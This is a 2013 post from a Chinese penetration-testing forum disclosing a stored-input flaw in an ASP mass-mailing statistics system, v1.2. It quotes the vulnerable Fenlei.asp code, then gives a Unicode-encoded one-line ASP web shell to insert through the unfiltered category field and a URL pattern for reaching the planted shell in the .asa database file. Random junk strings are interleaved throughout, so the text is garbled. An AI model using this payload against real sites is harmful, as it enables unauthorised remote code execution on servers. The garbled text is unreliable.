中国网络渗透测试联盟
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:14
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
- k; g+ f- {, a% h& l% t5 t
$ d0 Y# U: A: i$ A" y+ |
IF Request.QueryString("Action")="del" Then
4 L S& Z( k# Q) U
ID=Request.QueryString("ID")
) g" E1 A- b& G5 W! U4 V! S
IF Countss ("tui","Fenlei",ID )<>0 then
. k' X) U1 K1 H. W6 _
'略
# k1 z! t q3 A0 T* w
IF Request.QueryString("Action")="Add" Then
% N4 D* @! }, Z2 c
Tname=Request.Form("Typename")
4 `; y4 M. D( ]; |- Q# q# ~7 z/ v# f
Set Rs=Server.CreateObject("adodb.Recordset")
6 z- F9 @3 g" v: g. F, o# j
Sql="Select * From Fenlei Order by id Desc "
0 s' ]( J5 K5 U J+ |2 r, C
Rs.Open Sql,Conn,1,3
& {. }& _+ `, n2 H3 U$ M7 Z/ W* n
Rs.Addnew
9 E" F) o& u+ i( `
Rs("Typename")=Tname
6 b7 u+ y, {9 r
'略
( ~6 C0 L6 _0 T" Q+ u3 n1 Y7 P
Set Rs=Server.CreateObject("adodb.Recordset")
* x3 p& n' ]% r( `
Sql="Select * From Fenlei Order by id Desc "
3 q2 j% E* F3 Y& ^! A @0 ^
Rs.Open Sql,Conn,1,1
+ U4 H) F0 n- G" ]* b
'略
4 d( Z& ?7 A/ |; U
%>
9 y! K, T0 t0 y
7 ]" X5 C: H2 d$ l8 H
- @. K$ D/ P6 _$ f
: J6 E* A1 t$ N0 d# O
没有过滤,直接写入数据库。
N2 h' p! S2 i. i2 Y. I
D J8 F! |5 q ?
利用方法:
0 q. K! e+ } s3 c* F! u4 A1 |
/ H! a9 @1 v, Y& \/ O% f/ B
插入:┼攠數畣整爠煥敵瑳∨≡┩>
# y! i* t/ v) ~9 f. L/ U! E
- z8 T- @/ e' o- I5 n. Y
! H7 A& w2 P* G6 v2 C
连接:
http://www.xxx.com/###tongbaner.asa
% j7 e6 p: u3 z9 ? ~7 N
'默认安装文件:
! s4 R3 }; A3 Q/ D6 Q! [
'install.asp
: u L' W: r; [( A! ?, q
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2